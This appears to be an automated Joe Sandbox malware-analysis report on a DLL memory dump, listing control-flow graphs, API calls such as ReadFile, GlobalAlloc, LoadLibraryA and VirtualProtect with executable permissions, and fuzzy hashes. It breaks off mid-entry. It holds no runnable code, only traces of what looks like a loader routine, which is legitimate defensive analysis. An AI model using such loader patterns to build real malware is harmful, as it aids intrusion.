                          control_flow_graph 25 6fa663f0-6fa663f8 26 6fa663fe-6fa6640f 25->26 27 6fa6649c-6fa664c1 25->27 30 6fa66413-6fa6641e 26->30 28 6fa66524 27->28 29 6fa664c3 27->29 31 6fa66526-6fa66551 28->31 32 6fa664c5-6fa664cb 29->32 33 6fa66420 30->33 34 6fa66481 30->34 37 6fa66557-6fa66568 31->37 38 6fa665f1 31->38 32->32 36 6fa664cd-6fa664cf 32->36 39 6fa66422-6fa66427 33->39 35 6fa66483-6fa66487 34->35 42 6fa6648d-6fa66492 35->42 43 6fa6671b-6fa6671e 35->43 36->28 45 6fa664d1-6fa664d7 36->45 40 6fa6656c-6fa66577 37->40 44 6fa665f3-6fa66661 LoadLibraryA VirtualProtect call 6fa667f8 VirtualProtect 38->44 39->39 41 6fa66429-6fa6642b 39->41 46 6fa665da 40->46 47 6fa66579 40->47 41->34 48 6fa6642d-6fa66433 41->48 42->30 49 6fa66498 42->49 64 6fa66682-6fa666a9 44->64 65 6fa66663 44->65 51 6fa666f0 45->51 52 6fa664dd-6fa664e6 45->52 58 6fa665dc-6fa665e0 46->58 54 6fa6657b-6fa66580 47->54 55 6fa666e6 48->55 56 6fa66439-6fa66443 48->56 49->27 53 6fa664ea-6fa66501 52->53 53->53 63 6fa66503-6fa66513 53->63 54->54 59 6fa66582-6fa66584 54->59 69 6fa666fa 55->69 60 6fa66447-6fa6645e 56->60 61 6fa665e6-6fa665eb 58->61 62 6fa66704-6fa66716 58->62 59->46 67 6fa66586-6fa6658c 59->67 60->60 68 6fa66460-6fa66471 60->68 61->38 61->40 62->44 63->31 70 6fa66515-6fa66522 63->70 66 6fa66667-6fa66680 65->66 66->64 66->66 67->69 72 6fa66592-6fa6659c 67->72 68->35 73 6fa66473-6fa6647f 68->73 69->62 70->31 74 6fa665a0-6fa665b7 72->74 73->35 74->74 75 6fa665b9-6fa665ca 74->75 75->58 76 6fa665cc-6fa665d8 75->76 76->58
                          APIs
                          • LoadLibraryA.KERNELBASE(00000000), ref: 6FA66602
                          • VirtualProtect.KERNELBASE(?,?,00000040,00000000), ref: 6FA6663B
                          • VirtualProtect.KERNELBASE(?,?,?,00000000,?), ref: 6FA66654
                          Memory Dump Source
                          • Source File: 0000000F.00000002.2747606978.000000006FA61000.00000020.00000001.01000000.00000007.sdmp, Offset: 6FA60000, based on PE: true
                          • Associated: 0000000F.00000002.2747589985.000000006FA60000.00000002.00000001.01000000.00000007.sdmpDownload File
                          • Associated: 0000000F.00000002.2747699931.000000006FA88000.00000002.00000001.01000000.00000007.sdmpDownload File
                          • Associated: 0000000F.00000002.2747733204.000000006FA91000.00000004.00000001.01000000.00000007.sdmpDownload File
                          • Associated: 0000000F.00000002.2747733204.000000006FA95000.00000004.00000001.01000000.00000007.sdmpDownload File
                          • Associated: 0000000F.00000002.2747773065.000000006FA99000.00000002.00000001.01000000.00000007.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_15_2_6fa60000_DZIPR.jbxd
                          Similarity
                          • API ID: ProtectVirtual$LibraryLoad
                          • String ID:
                          • API String ID: 895956442-0
                          • Opcode ID: 41881c350274ffc890fbf218416a3e8db76204e8da4894e9f0a82b40daadcd03
                          • Instruction ID: d8cff2a5cd352e3ed3a02f96f75daf54280ef75ba7d223d454d8f6240f29b736
                          • Opcode Fuzzy Hash: 41881c350274ffc890fbf218416a3e8db76204e8da4894e9f0a82b40daadcd03
                          • Instruction Fuzzy Hash: 8DA1DF306087558FC315CF29C58062AFBE6BFCA304F09896EE8959B346D735F996CB81

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 105 6fa65ca0-6fa65d95 call 6fa6af9c * 2 call 6fa6afc3 * 2 call 6fa664e0 GetPEB 116 6fa65d97 105->116 117 6fa65de4 105->117 118 6fa65d99-6fa65da3 116->118 119 6fa65de6-6fa65e1d 117->119 120 6fa65dd6-6fa65dd8 118->120 121 6fa65da5-6fa65dab 118->121 122 6fa65e23-6fa65e3c 119->122 123 6fa65eba-6fa65f0c GlobalAlloc 119->123 128 6fa667e1-6fa667e4 120->128 129 6fa65dde-6fa65de2 120->129 127 6fa65dae-6fa65db5 121->127 124 6fa65e40-6fa65e4e 122->124 125 6fa65f12-6fa65f2b 123->125 126 6fa65fad 123->126 132 6fa65ea3 124->132 133 6fa65e50 124->133 131 6fa65f2f-6fa65f3d 125->131 130 6fa65faf-6fa65fce 126->130 134 6fa65db7-6fa65dbd 127->134 135 6fa65dc1-6fa65dcd 127->135 128->119 129->117 129->118 143 6fa65fe7-6fa65fea 130->143 144 6fa65fd0 130->144 137 6fa65f92 131->137 138 6fa65f3f 131->138 142 6fa65ea5-6fa65ea9 132->142 139 6fa65e52-6fa65e58 133->139 134->135 140 6fa65dbf 134->140 135->127 141 6fa65dcf-6fa65dd3 135->141 147 6fa65f94-6fa65f98 137->147 145 6fa65f41-6fa65f47 138->145 139->139 146 6fa65e5a-6fa65e5c 139->146 140->135 141->120 148 6fa667c3-6fa667dc 142->148 149 6fa65eaf-6fa65eb4 142->149 151 6fa65ffe-6fa66038 143->151 152 6fa65fec 143->152 150 6fa65fd2-6fa65fe5 144->150 145->145 153 6fa65f49-6fa65f4b 145->153 146->132 154 6fa65e5e-6fa65e64 146->154 155 6fa667a5-6fa667be 147->155 156 6fa65f9e-6fa65fa3 147->156 149->124 158 6fa65eb6 149->158 150->143 150->150 163 6fa6603e-6fa66057 151->163 164 6fa660d9 151->164 159 6fa65fee-6fa65ffc 152->159 153->137 160 6fa65f4d-6fa65f53 153->160 161 6fa666aa-6fa666af 154->161 162 6fa65e6a-6fa65e6e 154->162 155->130 156->131 165 6fa65fa5-6fa65fa9 156->165 158->123 159->151 159->159 168 6fa666b4 160->168 169 6fa65f59-6fa65f5d 160->169 166 6fa65e90-6fa65e95 161->166 170 6fa65e70-6fa65e86 162->170 171 6fa6605b-6fa66069 163->171 167 6fa660db-6fa660ef 164->167 165->126 166->142 176 6fa65e97-6fa65ea1 166->176 178 6fa666be 168->178 172 6fa65f5f-6fa65f75 169->172 170->170 173 6fa65e88-6fa65e8c 170->173 174 6fa660be 171->174 175 6fa6606b 171->175 172->172 179 6fa65f77-6fa65f84 172->179 173->166 177 6fa660c0-6fa660c4 174->177 180 6fa6606d-6fa66073 175->180 176->142 181 6fa660ca-6fa660cf 177->181 182 6fa66788-6fa667a0 177->182 178->182 179->147 183 6fa65f86-6fa65f90 179->183 180->180 184 6fa66075-6fa66077 180->184 181->171 185 6fa660d1-6fa660d5 181->185 182->167 183->147 184->174 186 6fa66079-6fa6607f 184->186 185->164 186->178 187 6fa66085-6fa66089 186->187 188 6fa6608b-6fa660a1 187->188 188->188 189 6fa660a3-6fa660b0 188->189 189->177 190 6fa660b2-6fa660bc 189->190 190->177
                          Memory Dump Source
                          • Source File: 0000000F.00000002.2747606978.000000006FA61000.00000020.00000001.01000000.00000007.sdmp, Offset: 6FA60000, based on PE: true
                          • Associated: 0000000F.00000002.2747589985.000000006FA60000.00000002.00000001.01000000.00000007.sdmpDownload File
                          • Associated: 0000000F.00000002.2747699931.000000006FA88000.00000002.00000001.01000000.00000007.sdmpDownload File
                          • Associated: 0000000F.00000002.2747733204.000000006FA91000.00000004.00000001.01000000.00000007.sdmpDownload File
                          • Associated: 0000000F.00000002.2747733204.000000006FA95000.00000004.00000001.01000000.00000007.sdmpDownload File
                          • Associated: 0000000F.00000002.2747773065.000000006FA99000.00000002.00000001.01000000.00000007.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_15_2_6fa60000_DZIPR.jbxd
                          Similarity
                          • API ID: LibraryLoad_memset
                          • String ID:
                          • API String ID: 2997193564-0
                          • Opcode ID: c00fd4526f90523be3bec7f7ef950da0915206d6d70076579191e3e34bc48dc4
                          • Instruction ID: 6b3f5c58761592844ffa6e574840f0db50adeb4928cdd1d97d7b460547807d87
                          • Opcode Fuzzy Hash: c00fd4526f90523be3bec7f7ef950da0915206d6d70076579191e3e34bc48dc4
                          • Instruction Fuzzy Hash: A9E15BB0A087058FC714CF1AC49062AFBE5FF89314F55896EE89A87352DB34B895CF91

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 351 6fa65e70-6fa65e86 351->351 352 6fa65e88-6fa65e8c 351->352 353 6fa65e90-6fa65e95 352->353 354 6fa65e97-6fa65ea1 353->354 355 6fa65ea5-6fa65ea9 353->355 354->355 356 6fa667c3-6fa667dc 355->356 357 6fa65eaf-6fa65eb4 355->357 359 6fa65eb6-6fa65f0c GlobalAlloc 357->359 360 6fa65e40-6fa65e4e 357->360 364 6fa65f12-6fa65f2b 359->364 365 6fa65fad 359->365 362 6fa65ea3 360->362 363 6fa65e50 360->363 362->355 366 6fa65e52-6fa65e58 363->366 368 6fa65f2f-6fa65f3d 364->368 367 6fa65faf-6fa65fce 365->367 366->366 369 6fa65e5a-6fa65e5c 366->369 374 6fa65fe7-6fa65fea 367->374 375 6fa65fd0 367->375 371 6fa65f92 368->371 372 6fa65f3f 368->372 369->362 373 6fa65e5e-6fa65e64 369->373 379 6fa65f94-6fa65f98 371->379 376 6fa65f41-6fa65f47 372->376 377 6fa666aa-6fa666af 373->377 378 6fa65e6a-6fa65e6e 373->378 381 6fa65ffe-6fa66038 374->381 382 6fa65fec 374->382 380 6fa65fd2-6fa65fe5 375->380 376->376 383 6fa65f49-6fa65f4b 376->383 377->353 378->351 384 6fa667a5-6fa667be 379->384 385 6fa65f9e-6fa65fa3 379->385 380->374 380->380 388 6fa6603e-6fa66057 381->388 389 6fa660d9 381->389 386 6fa65fee-6fa65ffc 382->386 383->371 387 6fa65f4d-6fa65f53 383->387 384->367 385->368 390 6fa65fa5-6fa65fa9 385->390 386->381 386->386 392 6fa666b4 387->392 393 6fa65f59-6fa65f5d 387->393 394 6fa6605b-6fa66069 388->394 391 6fa660db-6fa660ef 389->391 390->365 399 6fa666be 392->399 395 6fa65f5f-6fa65f75 393->395 396 6fa660be 394->396 397 6fa6606b 394->397 395->395 400 6fa65f77-6fa65f84 395->400 398 6fa660c0-6fa660c4 396->398 401 6fa6606d-6fa66073 397->401 402 6fa660ca-6fa660cf 398->402 403 6fa66788-6fa667a0 398->403 399->403 400->379 404 6fa65f86-6fa65f90 400->404 401->401 405 6fa66075-6fa66077 401->405 402->394 406 6fa660d1-6fa660d5 402->406 403->391 404->379 405->396 407 6fa66079-6fa6607f 405->407 406->389 407->399 408 6fa66085-6fa66089 407->408 409 6fa6608b-6fa660a1 408->409 409->409 410 6fa660a3-6fa660b0 409->410 410->398 411 6fa660b2-6fa660bc 410->411 411->398
                          APIs
                          • GlobalAlloc.KERNELBASE(00000000,007F50EB), ref: 6FA65ECA
                          Memory Dump Source
                          • Source File: 0000000F.00000002.2747606978.000000006FA61000.00000020.00000001.01000000.00000007.sdmp, Offset: 6FA60000, based on PE: true
                          • Associated: 0000000F.00000002.2747589985.000000006FA60000.00000002.00000001.01000000.00000007.sdmpDownload File
                          • Associated: 0000000F.00000002.2747699931.000000006FA88000.00000002.00000001.01000000.00000007.sdmpDownload File
                          • Associated: 0000000F.00000002.2747733204.000000006FA91000.00000004.00000001.01000000.00000007.sdmpDownload File
                          • Associated: 0000000F.00000002.2747733204.000000006FA95000.00000004.00000001.01000000.00000007.sdmpDownload File
                          • Associated: 0000000F.00000002.2747773065.000000006FA99000.00000002.00000001.01000000.00000007.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_15_2_6fa60000_DZIPR.jbxd
                          Similarity
                          • API ID: AllocGlobal
                          • String ID:
                          • API String ID: 3761449716-0
                          • Opcode ID: 7ba0e5eb3502ff6bb0422f3baf058e226b65cbab5efcb28b58a559986c7ffed5
                          • Instruction ID: e4c18bfb151c644ad1765362fb6d01d99a0328f7b3cd35191ebc358c4d6a183e
                          • Opcode Fuzzy Hash: 7ba0e5eb3502ff6bb0422f3baf058e226b65cbab5efcb28b58a559986c7ffed5
                          • Instruction Fuzzy Hash: 31A1A3706083068FC708CF1DC59062AB7E6BF89304F18C56DE89687356D735F896CB91

                          Control-flow Graph

                          APIs
                          • EnterCriticalSection.KERNEL32(6FA932EC,?,?,?,6FA932D0,6FA932D0,?,6FA6C0A4,00000004,6FA6AF00,6FA66DDD,6FA6A591,6FA62BC2,?,?,?), ref: 6FA6BC61
                          • GlobalAlloc.KERNELBASE(00000002,00000000,?,?,6FA932D0,6FA932D0,?,6FA6C0A4,00000004,6FA6AF00,6FA66DDD,6FA6A591,6FA62BC2,?,?,?), ref: 6FA6BCB7
                          • GlobalHandle.KERNEL32(00F1AF00), ref: 6FA6BCC0
                          • GlobalUnlock.KERNEL32(00000000), ref: 6FA6BCCA
                          • GlobalReAlloc.KERNEL32(6FA8C168,00000000,00002002), ref: 6FA6BCE3
                          • GlobalHandle.KERNEL32(00F1AF00), ref: 6FA6BCF5
                          • GlobalLock.KERNEL32(00000000), ref: 6FA6BCFC
                          • LeaveCriticalSection.KERNEL32(?,?,?,6FA932D0,6FA932D0,?,6FA6C0A4,00000004,6FA6AF00,6FA66DDD,6FA6A591,6FA62BC2,?,?,?,?), ref: 6FA6BD05
                          • GlobalLock.KERNEL32(00000000), ref: 6FA6BD11
                          • _memset.LIBCMT ref: 6FA6BD2B
                          • LeaveCriticalSection.KERNEL32(?,?), ref: 6FA6BD59
                          Memory Dump Source
                          • Source File: 0000000F.00000002.2747606978.000000006FA61000.00000020.00000001.01000000.00000007.sdmp, Offset: 6FA60000, based on PE: true
                          • Associated: 0000000F.00000002.2747589985.000000006FA60000.00000002.00000001.01000000.00000007.sdmpDownload File
                          • Associated: 0000000F.00000002.2747699931.000000006FA88000.00000002.00000001.01000000.00000007.sdmpDownload File
                          • Associated: 0000000F.00000002.2747733204.000000006FA91000.00000004.00000001.01000000.00000007.sdmpDownload File
                          • Associated: 0000000F.00000002.2747733204.000000006FA95000.00000004.00000001.01000000.00000007.sdmpDownload File
                          • Associated: 0000000F.00000002.2747773065.000000006FA99000.00000002.00000001.01000000.00000007.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_15_2_6fa60000_DZIPR.jbxd
                          Similarity
                          • API ID: Global$CriticalSection$AllocHandleLeaveLock$EnterUnlock_memset
                          • String ID:
                          • API String ID: 496899490-0
                          • Opcode ID: ea4430a68e584f20e0d97e61daad714dd46dcd03e15986775578b776a7d5590a
                          • Instruction ID: 182a082c621df6e0cf7dada9b17a5047ef8925df96ac3e6bd14f77e5f7be4dc8
                          • Opcode Fuzzy Hash: ea4430a68e584f20e0d97e61daad714dd46dcd03e15986775578b776a7d5590a
                          • Instruction Fuzzy Hash: FB31AF71604B04AFDB208F64C889A8ABBF9FF46350B048A29F562DB750DF74F991CB50

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 77 6fa664e0-6fa664e8 78 6fa664ea-6fa66501 77->78 78->78 79 6fa66503-6fa66513 78->79 80 6fa66526-6fa66551 79->80 81 6fa66515-6fa66522 79->81 82 6fa66557-6fa66568 80->82 83 6fa665f1 80->83 81->80 84 6fa6656c-6fa66577 82->84 85 6fa665f3-6fa66661 LoadLibraryA VirtualProtect call 6fa667f8 VirtualProtect 83->85 86 6fa665da 84->86 87 6fa66579 84->87 95 6fa66682-6fa666a9 85->95 96 6fa66663 85->96 91 6fa665dc-6fa665e0 86->91 89 6fa6657b-6fa66580 87->89 89->89 92 6fa66582-6fa66584 89->92 93 6fa665e6-6fa665eb 91->93 94 6fa66704-6fa66716 91->94 92->86 98 6fa66586-6fa6658c 92->98 93->83 93->84 94->85 97 6fa66667-6fa66680 96->97 97->95 97->97 100 6fa66592-6fa6659c 98->100 101 6fa666fa 98->101 102 6fa665a0-6fa665b7 100->102 101->94 102->102 103 6fa665b9-6fa665ca 102->103 103->91 104 6fa665cc-6fa665d8 103->104 104->91
                          APIs
                          • LoadLibraryA.KERNELBASE(00000000), ref: 6FA66602
                          • VirtualProtect.KERNELBASE(?,?,00000040,00000000), ref: 6FA6663B
                          Memory Dump Source
                          • Source File: 0000000F.00000002.2747606978.000000006FA61000.00000020.00000001.01000000.00000007.sdmp, Offset: 6FA60000, based on PE: true
                          • Associated: 0000000F.00000002.2747589985.000000006FA60000.00000002.00000001.01000000.00000007.sdmpDownload File
                          • Associated: 0000000F.00000002.2747699931.000000006FA88000.00000002.00000001.01000000.00000007.sdmpDownload File
                          • Associated: 0000000F.00000002.2747733204.000000006FA91000.00000004.00000001.01000000.00000007.sdmpDownload File
                          • Associated: 0000000F.00000002.2747733204.000000006FA95000.00000004.00000001.01000000.00000007.sdmpDownload File
                          • Associated: 0000000F.00000002.2747773065.000000006FA99000.00000002.00000001.01000000.00000007.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_15_2_6fa60000_DZIPR.jbxd
                          Similarity
                          • API ID: LibraryLoadProtectVirtual
                          • String ID:
                          • API String ID: 3279857687-0
                          • Opcode ID: 6a38d8b944e5cc748c60f96d9d50e9ebcc192d5faf0bd231bc51e9298f743698
                          • Instruction ID: 61c1084c33010c389dadcfc8db3fa13d84f772aa4d7361b2a74a1ff29b3d2862
                          • Opcode Fuzzy Hash: 6a38d8b944e5cc748c60f96d9d50e9ebcc192d5faf0bd231bc51e9298f743698
                          • Instruction Fuzzy Hash: 6951F3306083558FC715CF29C88062AFBEABFCA308F09896DE8855B316C735F946CB95

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 191 6fa66750-6fa66762 ReadFile 193 6fa661f0-6fa66207 191->193 194 6fa6630a-6fa66323 191->194 195 6fa66325-6fa66329 194->195 196 6fa6634d-6fa66368 194->196 198 6fa6632f 195->198 199 6fa66738 195->199 200 6fa6636a 196->200 201 6fa663cb 196->201 204 6fa66331-6fa6633c 198->204 199->191 202 6fa6636c-6fa66372 200->202 203 6fa663cd-6fa663ee 201->203 202->202 205 6fa66374-6fa66376 202->205 206 6fa666dc 203->206 204->204 207 6fa6633e-6fa66347 204->207 205->201 208 6fa66378-6fa6637e 205->208 206->199 207->196 209 6fa66349 207->209 208->206 210 6fa66384-6fa6638d 208->210 209->196 211 6fa66391-6fa663a8 210->211 211->211 212 6fa663aa-6fa663ba 211->212 212->203 213 6fa663bc-6fa663c9 212->213 213->203
                          APIs
                          • ReadFile.KERNELBASE(?,?,00000000,?,00000000,?,?,?,?,6FA8C168), ref: 6FA66300
                          Memory Dump Source
                          • Source File: 0000000F.00000002.2747606978.000000006FA61000.00000020.00000001.01000000.00000007.sdmp, Offset: 6FA60000, based on PE: true
                          • Associated: 0000000F.00000002.2747589985.000000006FA60000.00000002.00000001.01000000.00000007.sdmpDownload File
                          • Associated: 0000000F.00000002.2747699931.000000006FA88000.00000002.00000001.01000000.00000007.sdmpDownload File
                          • Associated: 0000000F.00000002.2747733204.000000006FA91000.00000004.00000001.01000000.00000007.sdmpDownload File
                          • Associated: 0000000F.00000002.2747733204.000000006FA95000.00000004.00000001.01000000.00000007.sdmpDownload File
                          • Associated: 0000000F.00000002.2747773065.000000006FA99000.00000002.00000001.01000000.00000007.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_15_2_6fa60000_DZIPR.jbxd
                          Similarity
                          • API ID: FileRead
                          • String ID:
                          • API String ID: 2738559852-0
                          • Opcode ID: 09f25f8358e41e864b56aa9fc93e958402ddd4d8073c7488a575acb30e65ba39
                          • Instruction ID: dc3a90c2e4e9e56cf6f98301acd5f6befbd2b215c8a0585a585bbc899de548c1
                          • Opcode Fuzzy Hash: 09f25f8358e41e864b56aa9fc93e958402ddd4d8073c7488a575acb30e65ba39
                          • Instruction Fuzzy Hash: 5641C2356087058FD704CF19C88067AB7E6FFC6324F09C96DE8899B315D635F8958B81

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 214 6fa662d0-6fa662d5 215 6fa66742-6fa6674e 214->215 216 6fa662db-6fa662e0 214->216 217 6fa662e2-6fa662f1 216->217 218 6fa6626d-6fa6627b 216->218 224 6fa662f3-6fa66304 ReadFile 217->224 219 6fa662cf 218->219 220 6fa6627d 218->220 223 6fa662d1-6fa662d5 219->223 222 6fa6627f-6fa66284 220->222 222->222 225 6fa66286-6fa66288 222->225 223->215 223->216 226 6fa661f0-6fa66207 224->226 227 6fa6630a-6fa66323 224->227 225->219 228 6fa6628a-6fa66290 225->228 229 6fa66325-6fa66329 227->229 230 6fa6634d-6fa66368 227->230 232 6fa66296-6fa6629a 228->232 233 6fa666d2 228->233 234 6fa6632f 229->234 235 6fa66738-6fa66762 229->235 236 6fa6636a 230->236 237 6fa663cb 230->237 239 6fa6629c-6fa662b2 232->239 233->215 241 6fa66331-6fa6633c 234->241 235->224 238 6fa6636c-6fa66372 236->238 240 6fa663cd-6fa663ee 237->240 238->238 242 6fa66374-6fa66376 238->242 239->239 243 6fa662b4-6fa662c1 239->243 244 6fa666dc 240->244 241->241 245 6fa6633e-6fa66347 241->245 242->237 247 6fa66378-6fa6637e 242->247 243->223 248 6fa662c3-6fa662cd 243->248 244->235 245->230 249 6fa66349 245->249 247->244 250 6fa66384-6fa6638d 247->250 248->223 249->230 251 6fa66391-6fa663a8 250->251 251->251 252 6fa663aa-6fa663ba 251->252 252->240 253 6fa663bc-6fa663c9 252->253 253->240
                          APIs
                          • ReadFile.KERNELBASE(?,?,00000000,?,00000000,?,?,?,?,6FA8C168), ref: 6FA66300
                          Memory Dump Source
                          • Source File: 0000000F.00000002.2747606978.000000006FA61000.00000020.00000001.01000000.00000007.sdmp, Offset: 6FA60000, based on PE: true
                          • Associated: 0000000F.00000002.2747589985.000000006FA60000.00000002.00000001.01000000.00000007.sdmpDownload File
                          • Associated: 0000000F.00000002.2747699931.000000006FA88000.00000002.00000001.01000000.00000007.sdmpDownload File
                          • Associated: 0000000F.00000002.2747733204.000000006FA91000.00000004.00000001.01000000.00000007.sdmpDownload File
                          • Associated: 0000000F.00000002.2747733204.000000006FA95000.00000004.00000001.01000000.00000007.sdmpDownload File
                          • Associated: 0000000F.00000002.2747773065.000000006FA99000.00000002.00000001.01000000.00000007.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_15_2_6fa60000_DZIPR.jbxd
                          Similarity
                          • API ID: FileRead
                          • String ID:
                          • API String ID: 2738559852-0
                          • Opcode ID: 7e66584fc38acc01ce0dd716bd038cd6c103cfefea0bf9fa393daec80eefb22d
                          • Instruction ID: 40b21ef278bcc4c2ace486a533810a89997dc0bda1740e86bac6b5a8a76b7a33
                          • Opcode Fuzzy Hash: 7e66584fc38acc01ce0dd716bd038cd6c103cfefea0bf9fa393daec80eefb22d
                          • Instruction Fuzzy Hash: DF31BF31A087058FC718CF19C88066AB7E6BFC6314F19C96DE8969B316D635F896CB81

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 254 6fa6c050-6fa6c068 call 6fa750c9 257 6fa6c06f-6fa6c072 254->257 258 6fa6c06a call 6fa66dc1 254->258 260 6fa6c074-6fa6c07c 257->260 261 6fa6c0aa-6fa6c0bb call 6fa6ba5b 257->261 258->257 263 6fa6c07e-6fa6c09d call 6fa6bd66 260->263 264 6fa6c09f call 6fa6bc4e 260->264 270 6fa6c0d0-6fa6c0d7 call 6fa751a1 261->270 271 6fa6c0bd-6fa6c0cb call 6fa6be0d 261->271 263->258 263->264 269 6fa6c0a4-6fa6c0a8 264->269 269->258 269->261 271->270
                          APIs
                          • __EH_prolog3.LIBCMT ref: 6FA6C057
                            • Part of subcall function 6FA66DC1: __CxxThrowException@8.LIBCMT ref: 6FA66DD7
                            • Part of subcall function 6FA66DC1: __EH_prolog3.LIBCMT ref: 6FA66DE4
                          Memory Dump Source
                          • Source File: 0000000F.00000002.2747606978.000000006FA61000.00000020.00000001.01000000.00000007.sdmp, Offset: 6FA60000, based on PE: true
                          • Associated: 0000000F.00000002.2747589985.000000006FA60000.00000002.00000001.01000000.00000007.sdmpDownload File
                          • Associated: 0000000F.00000002.2747699931.000000006FA88000.00000002.00000001.01000000.00000007.sdmpDownload File
                          • Associated: 0000000F.00000002.2747733204.000000006FA91000.00000004.00000001.01000000.00000007.sdmpDownload File
                          • Associated: 0000000F.00000002.2747733204.000000006FA95000.00000004.00000001.01000000.00000007.sdmpDownload File
                          • Associated: 0000000F.00000002.2747773065.000000006FA99000.00000002.00000001.01000000.00000007.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_15_2_6fa60000_DZIPR.jbxd
                          Similarity
                          • API ID: H_prolog3$Exception@8Throw
                          • String ID:
                          • API String ID: 2489616738-0
                          • Opcode ID: 690c3c7536aea81add65d59957869b99b1adeabde6c5625274ea453aa5a3fb80
                          • Instruction ID: fc78cc262cbab5698b98b5573df74ff4bb6badcad01ca86f22216deb5ee3010c
                          • Opcode Fuzzy Hash: 690c3c7536aea81add65d59957869b99b1adeabde6c5625274ea453aa5a3fb80
                          • Instruction Fuzzy Hash: CC019A34210702CBDF28AE65841166D36B6AF513A6F258538E4958B2D0EF39D9828B10

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 276 6fa660f0-6fa66139 CreateFileW 277 6fa661de-6fa66780 276->277 278 6fa6613f-6fa667e4 276->278 285 6fa65e23-6fa65e3c 278->285 286 6fa65eba-6fa65f0c GlobalAlloc 278->286 287 6fa65e40-6fa65e4e 285->287 288 6fa65f12-6fa65f2b 286->288 289 6fa65fad 286->289 293 6fa65ea3 287->293 294 6fa65e50 287->294 292 6fa65f2f-6fa65f3d 288->292 290 6fa65faf-6fa65fce 289->290 300 6fa65fe7-6fa65fea 290->300 301 6fa65fd0 290->301 296 6fa65f92 292->296 297 6fa65f3f 292->297 299 6fa65ea5-6fa65ea9 293->299 298 6fa65e52-6fa65e58 294->298 304 6fa65f94-6fa65f98 296->304 302 6fa65f41-6fa65f47 297->302 298->298 303 6fa65e5a-6fa65e5c 298->303 305 6fa667c3-6fa667dc 299->305 306 6fa65eaf-6fa65eb4 299->306 308 6fa65ffe-6fa66038 300->308 309 6fa65fec 300->309 307 6fa65fd2-6fa65fe5 301->307 302->302 310 6fa65f49-6fa65f4b 302->310 303->293 311 6fa65e5e-6fa65e64 303->311 312 6fa667a5-6fa667be 304->312 313 6fa65f9e-6fa65fa3 304->313 306->287 315 6fa65eb6 306->315 307->300 307->307 320 6fa6603e-6fa66057 308->320 321 6fa660d9 308->321 316 6fa65fee-6fa65ffc 309->316 310->296 317 6fa65f4d-6fa65f53 310->317 318 6fa666aa-6fa666af 311->318 319 6fa65e6a-6fa65e6e 311->319 312->290 313->292 322 6fa65fa5-6fa65fa9 313->322 315->286 316->308 316->316 325 6fa666b4 317->325 326 6fa65f59-6fa65f5d 317->326 323 6fa65e90-6fa65e95 318->323 327 6fa65e70-6fa65e86 319->327 328 6fa6605b-6fa66069 320->328 324 6fa660db-6fa660ef 321->324 322->289 323->299 333 6fa65e97-6fa65ea1 323->333 335 6fa666be 325->335 329 6fa65f5f-6fa65f75 326->329 327->327 330 6fa65e88-6fa65e8c 327->330 331 6fa660be 328->331 332 6fa6606b 328->332 329->329 336 6fa65f77-6fa65f84 329->336 330->323 334 6fa660c0-6fa660c4 331->334 337 6fa6606d-6fa66073 332->337 333->299 338 6fa660ca-6fa660cf 334->338 339 6fa66788-6fa667a0 334->339 335->339 336->304 340 6fa65f86-6fa65f90 336->340 337->337 341 6fa66075-6fa66077 337->341 338->328 342 6fa660d1-6fa660d5 338->342 339->324 340->304 341->331 343 6fa66079-6fa6607f 341->343 342->321 343->335 344 6fa66085-6fa66089 343->344 345 6fa6608b-6fa660a1 344->345 345->345 346 6fa660a3-6fa660b0 345->346 346->334 347 6fa660b2-6fa660bc 346->347 347->334
                          APIs
                          • CreateFileW.KERNELBASE(00000000,80000000,00000001,00000000,00000004,00000080,00000000), ref: 6FA660F6
                          Memory Dump Source
                          • Source File: 0000000F.00000002.2747606978.000000006FA61000.00000020.00000001.01000000.00000007.sdmp, Offset: 6FA60000, based on PE: true
                          • Associated: 0000000F.00000002.2747589985.000000006FA60000.00000002.00000001.01000000.00000007.sdmpDownload File
                          • Associated: 0000000F.00000002.2747699931.000000006FA88000.00000002.00000001.01000000.00000007.sdmpDownload File
                          • Associated: 0000000F.00000002.2747733204.000000006FA91000.00000004.00000001.01000000.00000007.sdmpDownload File
                          • Associated: 0000000F.00000002.2747733204.000000006FA95000.00000004.00000001.01000000.00000007.sdmpDownload File
                          • Associated: 0000000F.00000002.2747773065.000000006FA99000.00000002.00000001.01000000.00000007.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_15_2_6fa60000_DZIPR.jbxd
                          Similarity
                          • API ID: CreateFile
                          • String ID:
                          • API String ID: 823142352-0
                          • Opcode ID: f82b0445dcd6c41194a306ad42c12fe73917a35ba1a51f55d307128ec24a1e5e
                          • Instruction ID: 04c68dfbb1e15867aea2da4e8a4728ae713d8ce4cba0bc342f5a52bddf2d1b8e
                          • Opcode Fuzzy Hash: f82b0445dcd6c41194a306ad42c12fe73917a35ba1a51f55d307128ec24a1e5e
                          • Instruction Fuzzy Hash: A501E8B49087019FC718CF0AC89091ABBE6FFC9314F16856DA84897316CA31E851CF85

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 348 6fa7a6f4-6fa7a716 HeapCreate 349 6fa7a71a-6fa7a723 348->349 350 6fa7a718-6fa7a719 348->350
                          APIs
                          • HeapCreate.KERNELBASE(00000000,00001000,00000000,?,6FA74776,00000001,?,?,?,6FA748EF,?,?,?,6FA8E848,0000000C,6FA749AA), ref: 6FA7A709
                          Memory Dump Source
